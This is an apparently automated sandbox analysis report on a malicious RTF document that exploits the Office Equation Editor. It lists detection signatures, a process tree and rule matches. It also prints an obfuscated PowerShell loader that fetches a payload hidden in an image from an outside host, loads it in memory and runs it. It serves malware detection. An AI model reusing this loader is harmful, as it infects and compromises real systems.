Windows
Analysis Report
4YlwTsmpuZ.rtf
Overview
General Information
Sample name: | 4YlwTsmpuZ.rtf (renamed because original name is a hash value) |
Original sample name: | 9904916ce3549610216e99d83e7e2135.rtf |
Analysis ID: | 1466761 |
MD5: | 9904916ce3549610216e99d83e7e2135 |
SHA1: | d5eefab14ee9d5afa6258d3b399b46f779a56901 |
SHA256: | a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198 |
Tags: | rtf |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- WINWORD.EXE (PID: 2980, cmdline: `"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding`, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- EQNEDT32.EXE (PID: 2436, cmdline: `"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding`, MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- wscript.exe (PID: 3140, cmdline: `"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"`, MD5: 979D74799EA6C8B8167869A68DF5204A)
- powershell.exe (PID: 3200, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"`, MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- EQNEDT32.EXE (PID: 3404, cmdline: `"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding`, MD5: A87236E214F6D42A65F5DEDAC816AEC8)

Reading the powershell.exe command line: `$VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN''` evaluates to `ieX`, and the two `-crEPLAce` calls substitute `'` (char 39) for the token `YKo` and `$` (chars 57,52,89 = `94Y` replaced by char 36) for `94Y`, so `94Ylink` reads `$link` and `YKoRunPE.HomeYKo` reads `'RunPE.Home'`.
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| INDICATOR_RTF_MalVer_Objects | Detects RTF documents with a non-standard version that embed one of the objects mostly observed in exploit documents. | ditekSHen |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
Exploits |
---|---
Source: | Author: Joe Security
Source: | Author: Joe Security

System Summary |
---|---
Source: | Author: Max Altgelt (Nextron Systems)
Source: | Author: Thomas Patzke